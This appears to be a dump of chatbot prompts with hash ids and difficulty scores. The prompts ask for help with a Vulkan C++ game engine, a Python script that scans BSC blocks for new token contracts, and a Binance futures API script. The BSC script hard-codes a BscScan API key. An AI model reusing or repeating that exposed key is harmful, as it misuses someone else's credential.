//material->CreateDescriptorSet(mvpBuffer, sizeof(MVP));
// Map the MVP data into the buffer and unmap
void* data = nullptr;
vkMapMemory(device, mvpBufferMemory, 0, sizeof(MVP), 0, &data);
memcpy(data, &mvp, sizeof(MVP));
vkUnmapMemory(device, mvpBufferMemory);
// TODO: Modify your material, descriptor set, and pipeline to use this new mvpBuffer instead of
// the default uniform buffer
vkDeviceWaitIdle(device);
// Bind the DescriptorSet associated with the material
VkDescriptorSet descriptorSet = material->GetDescriptorSet();
//material->UpdateBufferBinding(descriptorSet, mvpBuffer, device, sizeof(MVP));
material->UpdateBufferBinding(mvpBuffer, device, sizeof(MVP));
vkCmdBindPipeline(*renderer.GetCurrentCommandBuffer(), VK_PIPELINE_BIND_POINT_GRAPHICS, renderer.GetPipeline().get()->GetPipeline());
vkCmdBindDescriptorSets(*renderer.GetCurrentCommandBuffer(), VK_PIPELINE_BIND_POINT_GRAPHICS, material->GetPipelineLayout(), 0, 1, &descriptorSet, 0, nullptr);
// Call vkCmdDrawIndexed()
uint32_t numIndices = static_cast<uint32_t>(mesh->GetIndices().size());
vkCmdDrawIndexed(*renderer.GetCurrentCommandBuffer(), numIndices, 1, 0, 0, 0);
// Cleanup the temporary buffer
/* vkDeviceWaitIdle(device);
vkDestroyBuffer(device, mvpBuffer, nullptr);
vkFreeMemory(device, mvpBufferMemory, nullptr);*/
}
void GameObject::Shutdown()
{
// Clean up resources, if necessary
// (depending on how Mesh and Material resources are managed)
if (material) {
material->Cleanup();
delete material;
material = nullptr;
}
if (mesh) {
delete mesh;
mesh = nullptr;
}
this->initialized = false;
}
void GameObject::SetPosition(const glm::vec3& position)
{
this->position = position;
UpdateModelMatrix();
}
void GameObject::SetRotation(const glm::vec3& rotation)
{
this->rotation = rotation;
UpdateModelMatrix();
}
void GameObject::SetScale(const glm::vec3& scale)
{
this->scale = scale;
UpdateModelMatrix();
}
void GameObject::UpdateModelMatrix()
{
modelMatrix = glm::mat4(1.0f);
modelMatrix = glm::translate(modelMatrix, position);
modelMatrix = glm::rotate(modelMatrix, rotation.x, glm::vec3(1.0f, 0.0f, 0.0f));
modelMatrix = glm::rotate(modelMatrix, rotation.y, glm::vec3(0.0f, 1.0f, 0.0f));
modelMatrix = glm::rotate(modelMatrix, rotation.z, glm::vec3(0.0f, 0.0f, 1.0f));
modelMatrix = glm::scale(modelMatrix, scale);
}
Mesh* GameObject::GetMesh()
{
return mesh;
}
Material* GameObject::GetMaterial()
{
return material;
}
Can you improve the code for the GameObject class?
|
457fa6ce1aa8693e7c322fa6dbbc7e91
|
{
"intermediate": 0.4166281521320343,
"beginner": 0.35532474517822266,
"expert": 0.22804704308509827
}
|
11,290
|
# Оптимизированный!!! Возвращает адреса созданных токенов из новых блоков в реальном времени
# Выводит только контракты, у которых есть имя
# Использован Web3
import asyncio
import aiohttp
import time
from web3 import Web3
bscscan_api_key = 'CXTB4IUT31N836G93ZI3YQBEWBQEGGH5QS'
# Create a semaphore with a limit of 3
semaphore = asyncio.Semaphore(1)
abi = [{"constant": True, "inputs": [], "name": "name", "outputs": [{"name": "", "type": "string"}], "payable": False, "stateMutability": "view", "type": "function"}]
w3 = Web3(Web3.HTTPProvider("https://bsc-dataseed.binance.org/"))
async def get_contract_details(contract_address):
try:
checksum_address = Web3.to_checksum_address(contract_address)
contract = w3.eth.contract(address=checksum_address, abi=abi)
name = contract.functions.name().call()
except Exception as e:
print(f"Error getting contract details: {e}")
return None
return {"name": name}
async def get_latest_block_number():
async with aiohttp.ClientSession() as session:
url = f'https://api.bscscan.com/api?module=proxy&action=eth_blockNumber&apikey={bscscan_api_key}'
async with session.get(url) as response:
data = await response.json()
return int(data['result'], 16)
async def get_external_transactions(block_number):
async with semaphore:
async with aiohttp.ClientSession() as session:
url = f'https://api.bscscan.com/api?module=proxy&action=eth_getBlockByNumber&tag={block_number}&boolean=true&apikey={bscscan_api_key}'
try:
async with session.get(url) as response:
data = await response.json()
except Exception as e:
print(f'Error in API request: {e}')
return []
if data['result'] is None or isinstance(data['result'], str):
print(f"Error: Cannot find the block")
return []
return data['result'].get('transactions', [])
async def get_contract_address(tx_hash):
async with semaphore:
async with aiohttp.ClientSession() as session:
url = f'https://api.bscscan.com/api?module=proxy&action=eth_getTransactionReceipt&txhash={tx_hash}&apikey={bscscan_api_key}'
try:
async with session.get(url) as response:
data = await response.json()
except Exception as e:
print(f'Error in API request: {e}')
return None
if data['result'] is None or not isinstance(data['result'], dict):
print(f"Error: Cannot find the address")
return None
return data['result'].get('contractAddress')
def check_method_id(input_data):
method_id = input_data[:10]
return method_id[-4:] == '6040'
async def process_block(block_number_int):
block_number = hex(block_number_int)
transactions = await get_external_transactions(block_number)
if not transactions:
print(f'No transactions found in block {block_number_int}')
else:
print(f'Transactions in block {block_number_int}:')
for tx in transactions:
if check_method_id(tx['input']):
if tx['to'] is None:
contract_address = await get_contract_address(tx['hash'])
contract_details = await get_contract_details(contract_address)
if contract_details:
print(f"New contract creation with TokenTracker details: Contract Address: {contract_address}, Name: {contract_details['name']}")
print("\n") # Print an empty line between blocks
async def display_transactions(block_start, block_end):
tasks = [process_block(block_number) for block_number in range(block_start, block_end + 1)]
await asyncio.gather(*tasks)
async def main():
block_start = await get_latest_block_number() # Start with the latest block number
block_end = block_start + 10 # Process 10 blocks initially
while True:
await display_transactions(block_start, block_end)
# Update block_start and block_end to check for new blocks every 5 seconds
block_start = block_end + 1
block_end = await get_latest_block_number()
time.sleep(5)
asyncio.run(main())
Add the code below so that in addition to the contract address and name, it also displays the address of the contract creator
|
0c4d4ebf8bc75344c99439b66d95c8e8
|
{
"intermediate": 0.4319572150707245,
"beginner": 0.4892805814743042,
"expert": 0.0787622258067131
}
|
11,291
|
I’m building a video game engine using C++ as the coding language and Vulkan for graphics. I am trying to set up a generic renderer using Vulkan that is flexible and will render objects based on a vector that is supplied to it. The renderer will also handle the creation of the window using GLFW and use GLM for all relevant math calls. I am using the ASSIMP library to load 3d models and animations.
Here is a portion of the code:
BufferUtils.h:
#pragma once
#include <vulkan/vulkan.h>
#include <stdint.h>
namespace BufferUtils
{
void CreateBuffer(
VkDevice device, VkPhysicalDevice physicalDevice,
VkDeviceSize size, VkBufferUsageFlags usage, VkMemoryPropertyFlags properties,
VkBuffer& buffer, VkDeviceMemory& bufferMemory);
uint32_t FindMemoryType(VkPhysicalDevice physicalDevice, uint32_t typeFilter, VkMemoryPropertyFlags properties);
void CopyBuffer(
VkDevice device, VkCommandPool commandPool, VkQueue graphicsQueue,
VkBuffer srcBuffer, VkBuffer dstBuffer, VkDeviceSize size);
}
Camera.h:
#pragma once
#include <glm/glm.hpp>
class Camera
{
public:
Camera();
~Camera();
void Initialize(float aspectRatio);
void Shutdown();
void SetPosition(const glm::vec3& position);
void SetRotation(const glm::vec3& rotation);
const glm::mat4& GetViewMatrix() const;
const glm::mat4& GetProjectionMatrix() const;
private:
glm::vec3 position;
glm::vec3 rotation;
glm::mat4 viewMatrix;
glm::mat4 projectionMatrix;
void UpdateViewMatrix();
};
Engine.h:
#pragma once
#include "Window.h"
#include "Renderer.h"
#include "Scene.h"
#include <chrono>
#include <thread>
class Engine
{
public:
Engine();
~Engine();
void Run();
void Shutdown();
int MaxFPS = 60;
private:
void Initialize();
void MainLoop();
void Update(float deltaTime);
void Render();
Window window;
Renderer renderer;
Scene scene;
};
GameObject.h:
#pragma once
#include <glm/glm.hpp>
#include "Mesh.h"
#include "Material.h"
#include "Camera.h"
#include "Renderer.h"
class GameObject
{
public:
GameObject();
~GameObject();
void Initialize();
void Initialize2(Renderer& renderer);
void Update(float deltaTime);
void Render(Renderer& renderer, const Camera& camera);
void Shutdown();
void SetPosition(const glm::vec3& position);
void SetRotation(const glm::vec3& rotation);
void SetScale(const glm::vec3& scale);
Mesh* GetMesh();
Material* GetMaterial();
private:
glm::mat4 modelMatrix;
glm::vec3 position;
glm::vec3 rotation;
glm::vec3 scale;
VkDeviceMemory mvpBufferMemory;
VkBuffer mvpBuffer;
Mesh* mesh;
Material* material;
bool initialized = false;
void UpdateModelMatrix();
};
Material.h:
#pragma once
#include <vulkan/vulkan.h>
#include "Texture.h"
#include "Shader.h"
#include <stdexcept>
#include <memory> // Don’t forget to include <memory>
#include <array>
// Add this struct outside the Material class, possibly at the top of Material.cpp
struct ShaderDeleter {
void operator()(Shader* shaderPtr) {
if (shaderPtr != nullptr) {
Shader::Cleanup(shaderPtr);
}
}
};
class Material
{
public:
Material();
~Material();
void Initialize(const std::string& vertShaderPath, const std::string& fragShaderPath, const std::string& texturePath, VkDevice device, VkDescriptorSetLayout descriptorSetLayout, VkDescriptorPool descriptorPool, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Cleanup();
void LoadTexture(const std::string& filename, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void LoadShaders(const std::string& vertFilename, const std::string& fragFilename, VkDevice device);
void UpdateBufferBinding(VkBuffer newBuffer, VkDevice device, VkDeviceSize devicesize);
VkDescriptorSet GetDescriptorSet() const;
VkPipelineLayout GetPipelineLayout() const;
std::shared_ptr <Shader> GetvertexShader();
std::shared_ptr <Shader> GetfragmentShader();
void CreateDescriptorSet(VkBuffer uniformBuffer, VkDeviceSize bufferSize);
private:
VkDevice device;
std::shared_ptr <Shader> vertexShader;
std::shared_ptr <Shader> fragmentShader;
std::shared_ptr<Texture> texture;
void CreatePipelineLayout(VkDescriptorSetLayout descriptorSetLayout);
VkDescriptorSet descriptorSet;
VkPipelineLayout pipelineLayout;
VkDescriptorSetLayout descriptorSetLayout;// = VK_NULL_HANDLE;
VkDescriptorPool descriptorPool;
void CleanupDescriptorSetLayout();
};
Mesh.h:
#pragma once
#include <vector>
#include <vulkan/vulkan.h>
#include <glm/glm.hpp>
#include "BufferUtils.h"
struct Vertex {
glm::vec3 position;
glm::vec3 color;
glm::vec2 texCoord;
};
class Mesh
{
public:
Mesh();
~Mesh();
void Initialize(std::vector<Vertex> vertices, std::vector<uint32_t> indices, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Initialize(VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Cleanup();
const std::vector<Vertex>& GetVertices() const;
const std::vector<uint32_t>& GetIndices() const;
VkBuffer GetVertexBuffer() const;
VkBuffer GetIndexBuffer() const;
void SetVertices(const std::vector<Vertex>& vertices);
void SetIndices(const std::vector<uint32_t>& indices);
std::vector<VkVertexInputBindingDescription> GetVertexInputBindingDescriptions() const;
std::vector<VkVertexInputAttributeDescription> GetVertexInputAttributeDescriptions() const;
private:
VkDevice device;
std::vector<Vertex> vertices;
std::vector<uint32_t> indices;
VkBuffer vertexBuffer;
VkDeviceMemory vertexBufferMemory;
VkBuffer indexBuffer;
VkDeviceMemory indexBufferMemory;
};
Model.h:
#pragma once
#include <assimp/Importer.hpp>
#include <assimp/scene.h>
#include <assimp/postprocess.h>
#include "Mesh.h"
#include <string>
#include <vector>
#include <vulkan/vulkan.h>
#include <stdexcept>
class Model
{
public:
Model();
~Model();
void LoadModel(const std::string& filepath, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
void Cleanup();
const std::vector<Mesh>& GetMeshes() const;
private:
std::vector<Mesh> meshes;
void LoadNode(aiNode* node, const aiScene* scene, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
Mesh LoadMesh(aiMesh* mesh, const aiScene* scene);
};
Pipeline.h:
#pragma once
#include <vulkan/vulkan.h>
#include <vector>
#include <array>
#include <stdexcept>
#include "Shader.h"
class Pipeline
{
public:
Pipeline();
~Pipeline();
void CreateGraphicsPipeline(const std::vector<VkVertexInputBindingDescription>& vertexBindingDescriptions,
const std::vector<VkVertexInputAttributeDescription>& vertexAttributeDescriptions,
VkExtent2D swapchainExtent,
const std::vector<Shader*>& shaders,
VkRenderPass renderPass,
VkPipelineLayout pipelineLayout,
VkDevice device);
void Cleanup();
VkPipeline GetPipeline() const;
bool IsInitialized() const;
private:
VkDevice device;
VkPipeline pipeline;
bool initialized;
void CreateShaderStages(const std::vector<Shader*>& shaders, std::vector<VkPipelineShaderStageCreateInfo>& shaderStages);
};
Renderer.h:
#pragma once
#include <vulkan/vulkan.h>
#include "Window.h"
#include <vector>
#include <stdexcept>
#include <set>
#include <optional>
#include <iostream>
#include "Pipeline.h"
#include "Material.h"
#include "Mesh.h"
struct QueueFamilyIndices
{
std::optional<uint32_t> graphicsFamily;
std::optional<uint32_t> presentFamily;
bool IsComplete()
{
return graphicsFamily.has_value() && presentFamily.has_value();
}
};
struct SwapChainSupportDetails {
VkSurfaceCapabilitiesKHR capabilities;
std::vector<VkSurfaceFormatKHR> formats;
std::vector<VkPresentModeKHR> presentModes;
};
struct MVP {
glm::mat4 model;
glm::mat4 view;
glm::mat4 projection;
};
class Renderer
{
public:
Renderer();
~Renderer();
void Initialize(GLFWwindow* window);
void Shutdown();
void BeginFrame();
void EndFrame();
VkDescriptorSetLayout CreateDescriptorSetLayout();
VkDescriptorPool CreateDescriptorPool(uint32_t maxSets);
VkDevice* GetDevice();
VkPhysicalDevice* GetPhysicalDevice();
VkCommandPool* GetCommandPool();
VkQueue* GetGraphicsQueue();
VkCommandBuffer* GetCurrentCommandBuffer();
std::shared_ptr<Pipeline> GetPipeline();
void CreateGraphicsPipeline(Mesh* mesh, Material* material);
std::pair<VkBuffer, VkDeviceMemory> RequestMvpBuffer();
private:
bool isShutDown = false;
static const uint32_t kMvpBufferCount = 3;
std::vector<VkBuffer> mvpBuffers;
std::vector<VkDeviceMemory> mvpBufferMemory;
uint32_t currentMvpBufferIndex = 0;
bool shutdownInProgress;
uint32_t currentCmdBufferIndex = 0;
std::vector<size_t> currentFramePerImage;
std::vector<VkImage> swapChainImages;
std::vector<VkImageView> swapChainImageViews;
VkExtent2D swapChainExtent;
VkRenderPass renderPass;
uint32_t imageIndex;
std::shared_ptr<Pipeline> pipeline;
VkFormat swapChainImageFormat;
std::vector<VkCommandBuffer> commandBuffers;
void CreateImageViews();
void CleanupImageViews();
void CreateRenderPass();
void CleanupRenderPass();
void CreateSurface();
void DestroySurface();
void CreateInstance();
void CleanupInstance();
void ChoosePhysicalDevice();
void CreateDevice();
void CleanupDevice();
void CreateSwapchain();
void CleanupSwapchain();
void CreateCommandPool();
void CleanupCommandPool();
void CreateFramebuffers();
void CleanupFramebuffers();
void CreateCommandBuffers();
void CleanupCommandBuffers();
void Present();
GLFWwindow* window;
VkInstance instance = VK_NULL_HANDLE;
VkPhysicalDevice physicalDevice = VK_NULL_HANDLE;
VkDevice device = VK_NULL_HANDLE;
VkSurfaceKHR surface;
VkSwapchainKHR swapchain;
VkCommandPool commandPool;
VkCommandBuffer currentCommandBuffer;
std::vector<VkFramebuffer> framebuffers;
// Additional Vulkan objects needed for rendering…
const uint32_t kMaxFramesInFlight = 2;
std::vector<VkSemaphore> imageAvailableSemaphores;
std::vector<VkSemaphore> renderFinishedSemaphores;
std::vector<VkFence> inFlightFences;
size_t currentFrame;
VkQueue graphicsQueue;
VkQueue presentQueue;
void CreateSyncObjects();
void CleanupSyncObjects();
SwapChainSupportDetails querySwapChainSupport(VkPhysicalDevice device, VkSurfaceKHR surface);
VkSurfaceFormatKHR chooseSwapSurfaceFormat(const std::vector<VkSurfaceFormatKHR>& availableFormats);
VkPresentModeKHR chooseSwapPresentMode(const std::vector<VkPresentModeKHR>& availablePresentModes);
VkExtent2D chooseSwapExtent(const VkSurfaceCapabilitiesKHR& capabilities, GLFWwindow* window);
std::vector<const char*> deviceExtensions = {
VK_KHR_SWAPCHAIN_EXTENSION_NAME
};
std::vector<const char*> CheckPhysicalDeviceExtensionSupport(VkPhysicalDevice physicalDevice);
QueueFamilyIndices GetQueueFamilyIndices(VkPhysicalDevice physicalDevice);
};
Scene.h:
#pragma once
#include <vector>
#include "GameObject.h"
#include "Camera.h"
#include "Renderer.h"
class Scene
{
public:
Scene();
~Scene();
void Initialize();
void Update(float deltaTime);
void Render(Renderer& renderer);
void Shutdown();
void AddGameObject(GameObject* gameObject);
Camera& GetCamera();
float temp;
private:
std::vector<GameObject*> gameObjects;
Camera camera;
};
Shader.h:
#pragma once
#include <vulkan/vulkan.h>
#include <string>
class Shader
{
public:
Shader();
~Shader();
void LoadFromFile(const std::string& filename, VkDevice device, VkShaderStageFlagBits stage);
VkPipelineShaderStageCreateInfo GetPipelineShaderStageCreateInfo() const;
static void Cleanup(Shader* shader);
private:
VkDevice device;
VkShaderModule shaderModule;
VkShaderStageFlagBits stage;
};
Simplex.h:
#pragma once
#ifndef SIMPLEX_H
#define SIMPLEX_H
#include <iostream>
class SimplexNoise {
private:
int testvar;
int grad3[12][3]{ { 1, 1, 0 }, { -1, 1, 0 }, { 1, -1, 0 },
{ -1, -1, 0 }, { 1, 0, 1 }, { -1, 0, 1 }, { 1, 0, -1 },
{ -1, 0, -1 }, { 0, 1, 1 }, { 0, -1, 1 }, { 0, 1, -1 },
{ 0, -1, -1 } };
int grad4[32][4] = { { 0, 1, 1, 1 }, { 0, 1, 1, -1 },
{ 0, 1, -1, 1 }, { 0, 1, -1, -1 }, { 0, -1, 1, 1 },
{ 0, -1, 1, -1 }, { 0, -1, -1, 1 }, { 0, -1, -1, -1 },
{ 1, 0, 1, 1 }, { 1, 0, 1, -1 }, { 1, 0, -1, 1 }, { 1, 0, -1, -1 },
{ -1, 0, 1, 1 }, { -1, 0, 1, -1 }, { -1, 0, -1, 1 },
{ -1, 0, -1, -1 }, { 1, 1, 0, 1 }, { 1, 1, 0, -1 },
{ 1, -1, 0, 1 }, { 1, -1, 0, -1 }, { -1, 1, 0, 1 },
{ -1, 1, 0, -1 }, { -1, -1, 0, 1 }, { -1, -1, 0, -1 },
{ 1, 1, 1, 0 }, { 1, 1, -1, 0 }, { 1, -1, 1, 0 }, { 1, -1, -1, 0 },
{ -1, 1, 1, 0 }, { -1, 1, -1, 0 }, { -1, -1, 1, 0 },
{ -1, -1, -1, 0 } };
int p_supply[256] = { 151, 160, 137, 91, 90, 15, 131, 13, 201, 95, 96,
53, 194, 233, 7, 225, 140, 36, 103, 30, 69, 142, 8, 99, 37, 240,
21, 10, 23, 190, 6, 148, 247, 120, 234, 75, 0, 26, 197, 62, 94,
252, 219, 203, 117, 35, 11, 32, 57, 177, 33, 88, 237, 149, 56, 87,
174, 20, 125, 136, 171, 168, 68, 175, 74, 165, 71, 134, 139, 48,
27, 166, 77, 146, 158, 231, 83, 111, 229, 122, 60, 211, 133, 230,
220, 105, 92, 41, 55, 46, 245, 40, 244, 102, 143, 54, 65, 25, 63,
161, 1, 216, 80, 73, 209, 76, 132, 187, 208, 89, 18, 169, 200, 196,
135, 130, 116, 188, 159, 86, 164, 100, 109, 198, 173, 186, 3, 64,
52, 217, 226, 250, 124, 123, 5, 202, 38, 147, 118, 126, 255, 82,
85, 212, 207, 206, 59, 227, 47, 16, 58, 17, 182, 189, 28, 42, 223,
183, 170, 213, 119, 248, 152, 2, 44, 154, 163, 70, 221, 153, 101,
155, 167, 43, 172, 9, 129, 22, 39, 253, 19, 98, 108, 110, 79, 113,
224, 232, 178, 185, 112, 104, 218, 246, 97, 228, 251, 34, 242, 193,
238, 210, 144, 12, 191, 179, 162, 241, 81, 51, 145, 235, 249, 14,
239, 107, 49, 192, 214, 31, 181, 199, 106, 157, 184, 84, 204, 176,
115, 121, 50, 45, 127, 4, 150, 254, 138, 236, 205, 93, 222, 114,
67, 29, 24, 72, 243, 141, 128, 195, 78, 66, 215, 61, 156, 180 };
// To remove the need for index wrapping, double the permutation table
// length
int perm[512] = {};
/*static {
for (int i = 0; i < 512; i++)
perm[i] = p[i & 255];
}*/
// A lookup table to traverse the simplex around a given point in 4D.
// Details can be found where this table is used, in the 4D noise method.
int simplex[64][4] = { { 0, 1, 2, 3 }, { 0, 1, 3, 2 },
{ 0, 0, 0, 0 }, { 0, 2, 3, 1 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 1, 2, 3, 0 }, { 0, 2, 1, 3 }, { 0, 0, 0, 0 },
{ 0, 3, 1, 2 }, { 0, 3, 2, 1 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 1, 3, 2, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 1, 2, 0, 3 }, { 0, 0, 0, 0 },
{ 1, 3, 0, 2 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 2, 3, 0, 1 }, { 2, 3, 1, 0 }, { 1, 0, 2, 3 }, { 1, 0, 3, 2 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 2, 0, 3, 1 },
{ 0, 0, 0, 0 }, { 2, 1, 3, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 2, 0, 1, 3 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 3, 0, 1, 2 }, { 3, 0, 2, 1 },
{ 0, 0, 0, 0 }, { 3, 1, 2, 0 }, { 2, 1, 0, 3 }, { 0, 0, 0, 0 },
{ 0, 0, 0, 0 }, { 0, 0, 0, 0 }, { 3, 1, 0, 2 }, { 0, 0, 0, 0 },
{ 3, 2, 0, 1 }, { 3, 2, 1, 0 } };
int p[256] = {};
int RANDOMSEED = 0;
int NUMBEROFSWAPS = 400;
public:
SimplexNoise(int inseed);
double noise(double xin, double yin);
double noise(double xin, double yin, double zin);
double noise(double xin, double yin, double zin, double win);
};
#endif
Terrain.h:
#pragma once
#include "Simplex.h"
#include "Mesh.h"
#include "Material.h"
#include "GameObject.h"
class Terrain {
public:
Terrain(int seed, int worldSize, float scale, VkDevice* device, VkPhysicalDevice* physicalDevice, VkCommandPool* commandPool, VkQueue* graphicsQueue);
~Terrain();
void GenerateTerrain(VkDescriptorSetLayout descriptorSetLayout, VkDescriptorSetLayout samplerDescriptorSetLayout, VkDescriptorPool descriptorPool);
GameObject* GetTerrainObject();
private:
void GenerateHeightMap();
void ConvertHeightMapToMeshData();
int seed;
int worldSize;
float scale;
VkDevice* device;
VkPhysicalDevice* physicalDevice;
VkCommandPool* commandPool;
VkQueue* graphicsQueue;
SimplexNoise noise;
std::vector<std::vector<float>> heightMap;
std::vector<Vertex> vertices;
std::vector<uint32_t> indices;
Mesh* terrainMesh;
Material* terrainMaterial;
GameObject* terrainObject;
};
Texture.h:
#pragma once
#include <vulkan/vulkan.h>
#include "stb_image.h" // Include the stb_image header
#include "BufferUtils.h"
#include <string>
class Texture
{
public:
Texture();
~Texture();
void LoadFromFile(const std::string& filename, VkDevice device, VkPhysicalDevice physicalDevice, VkCommandPool commandPool, VkQueue graphicsQueue);
VkImageView GetImageView() const;
VkSampler GetSampler() const;
void Cleanup();
private:
VkDevice device;
VkImage image;
VkDeviceMemory imageMemory;
VkImageView imageView;
VkSampler sampler;
VkPhysicalDevice physicalDevice;
VkCommandPool commandPool;
VkQueue graphicsQueue;
bool initialized = false;
void CreateImage(uint32_t width, uint32_t height, uint32_t mipLevels, VkSampleCountFlagBits numSamples,
VkFormat format, VkImageTiling tiling, VkImageUsageFlags usage, VkMemoryPropertyFlags properties);
void TransitionImageLayout(VkImageLayout oldLayout, VkImageLayout newLayout,
uint32_t mipLevels, VkSampleCountFlagBits numSamples);
void CopyBufferToImage(VkBuffer buffer, uint32_t width, uint32_t height);
void CreateImageView(VkFormat format, VkImageAspectFlags aspectFlags, uint32_t mipLevels);
void CreateSampler(uint32_t mipLevels);
void GenerateMipmaps(uint32_t width, uint32_t height, uint32_t mipLevels);
VkCommandBuffer BeginSingleTimeCommands(VkCommandPool commandPool, VkDevice device);
void EndSingleTimeCommands(VkCommandPool commandPool, VkQueue graphicsQueue, VkDevice device, VkCommandBuffer commandBuffer);
};
Window.h:
#pragma once
#define GLFW_INCLUDE_VULKAN
#include <GLFW/glfw3.h>
class Window
{
public:
Window(int width = 800, int height = 600, const char* title = "Game Engine");
~Window();
void Initialize();
void PollEvents();
void Shutdown();
bool ShouldClose() const;
GLFWwindow* GetWindow() const;
float GetDeltaTime();
private:
static void FramebufferResizeCallback(GLFWwindow* window, int width, int height);
static void keyCallback(GLFWwindow* window, int key, int scancode, int action, int mods);
int width;
int height;
const char* title;
GLFWwindow* window;
double lastFrameTime;
};
Engine.cpp:
#include "Engine.h"
#include "Terrain.h"
#include <iostream>
Engine::Engine()
{
Initialize();
}
Engine::~Engine()
{
Shutdown();
}
void Engine::Run()
{
MainLoop();
}
void Engine::Initialize()
{
// Initialize window, renderer, and scene
window.Initialize();
renderer.Initialize(window.GetWindow());
scene.Initialize();
VkDescriptorSetLayout descriptorSetLayout = renderer.CreateDescriptorSetLayout();
//VkDescriptorPool descriptorPool = renderer.CreateDescriptorPool(1); // Assuming only one terrain object
//VkDescriptorSetLayout samplerDescriptorSetLayout = renderer.CreateSamplerDescriptorSetLayout(); // Use this new method to create a separate descriptor layout.
VkDescriptorPool descriptorPool = renderer.CreateDescriptorPool(1);
// Create a simple square tile GameObject
GameObject* squareTile = new GameObject();
squareTile->Initialize();
// Define the cube’s vertices and indices
std::vector<Vertex> vertices = {
{ {-0.5f, -0.5f, -0.5f}, {1.0f, 0.0f, 0.0f}, {0.0f, 0.0f} }, // bottom-left-back
{ { 0.5f, -0.5f, -0.5f}, {0.0f, 1.0f, 0.0f}, {1.0f, 0.0f} }, // bottom-right-back
{ { 0.5f, 0.5f, -0.5f}, {0.0f, 0.0f, 1.0f}, {1.0f, 1.0f} }, // top-right-back
{ {-0.5f, 0.5f, -0.5f}, {1.0f, 1.0f, 0.0f}, {0.0f, 1.0f} }, // top-left-back
{ {-0.5f, -0.5f, 0.5f}, {0.0f, 1.0f, 1.0f}, {1.0f, 0.0f} }, // bottom-left-front
{ { 0.5f, -0.5f, 0.5f}, {1.0f, 1.0f, 1.0f}, {0.0f, 0.0f} }, // bottom-right-front
{ { 0.5f, 0.5f, 0.5f}, {1.0f, 0.0f, 1.0f}, {0.0f, 1.0f} }, // top-right-front
{ {-0.5f, 0.5f, 0.5f}, {0.0f, 0.0f, 0.0f}, {1.0f, 1.0f} }, // top-left-front
};
std::vector<uint32_t> indices = {
0, 1, 2, 2, 3, 0, // back face
0, 3, 7, 7, 4, 0, // left face
4, 7, 6, 6, 5, 4, // front face
1, 5, 6, 6, 2, 1, // right face
3, 2, 6, 6, 7, 3, // top face
0, 4, 5, 5, 1, 0 // bottom face
};
// Initialize mesh and material for the square tile
squareTile->GetMesh()->Initialize(vertices, indices, *renderer.GetDevice(), *renderer.GetPhysicalDevice(), *renderer.GetCommandPool(), *renderer.GetGraphicsQueue());
squareTile->GetMaterial()->Initialize("C:/shaders/vert_depth.spv", "C:/shaders/frag_depth.spv", "C:/textures/texture.jpg", *renderer.GetDevice(), descriptorSetLayout, descriptorPool, *renderer.GetPhysicalDevice(), *renderer.GetCommandPool(), *renderer.GetGraphicsQueue());
squareTile->Initialize2(renderer);
// Add the square tile GameObject to the scene
scene.AddGameObject(squareTile);
/*Terrain terrain(0,10,1,renderer.GetDevice(), renderer.GetPhysicalDevice(), renderer.GetCommandPool(), renderer.GetGraphicsQueue());
terrain.GenerateTerrain(descriptorSetLayout, samplerDescriptorSetLayout, descriptorPool);*/
//scene.AddGameObject(terrain.GetTerrainObject());
float deltaTime = window.GetDeltaTime();
}
void Engine::MainLoop()
{
while (!window.ShouldClose())
{
window.PollEvents();
float deltaTime = window.GetDeltaTime();
Update(deltaTime);
Render();
auto sleep_duration = std::chrono::milliseconds(1000 / MaxFPS);
std::this_thread::sleep_for(sleep_duration);
}
}
void Engine::Update(float deltaTime)
{
scene.Update(deltaTime);
}
void Engine::Render()
{
renderer.BeginFrame();
scene.Render(renderer);
renderer.EndFrame();
}
void Engine::Shutdown()
{
vkDeviceWaitIdle(*renderer.GetDevice());
// Clean up resources in reverse order
scene.Shutdown();
renderer.Shutdown();
window.Shutdown();
}
Can you improve the code for the Engine class?
|
7a5e9b9760e63d44dfe37b294f60ad52
|
{
"intermediate": 0.4166281521320343,
"beginner": 0.35532474517822266,
"expert": 0.22804704308509827
}
|
11,292
|
hi
|
ff35108df203df2e22114d2467f0b48a
|
{
"intermediate": 0.3246487081050873,
"beginner": 0.27135494351387024,
"expert": 0.40399640798568726
}
|
11,293
|
I used this code: import time
from binance.client import Client
from binance.enums import *
from binance.exceptions import BinanceAPIException
from binance.helpers import round_step_size
import pandas as pd
import json
import numpy as np
import pytz
import datetime as dt
import ccxt
from decimal import Decimal
import requests
import hmac
import hashlib
import ntplib
import os
API_KEY = ''
API_SECRET = ''
client = Client(API_KEY, API_SECRET)
# Set the endpoint and parameters for the request
url = "https://fapi.binance.com/fapi/v2/account"
timestamp = int(time.time() * 1000)
recv_window = 5000
params = {
"timestamp": timestamp,
"recvWindow": recv_window
}
# Sign the message using the Client’s secret key
message = '&'.join([f"{k}={v}" for k, v in params.items()])
signature = hmac.new(API_SECRET.encode(), message.encode(), hashlib.sha256).hexdigest()
params['signature'] = signature
leverage = 100
# Send the request using the requests library
response = requests.get(url, params=params, headers={'X-MBX-APIKEY': API_KEY})
account_info = response.json()
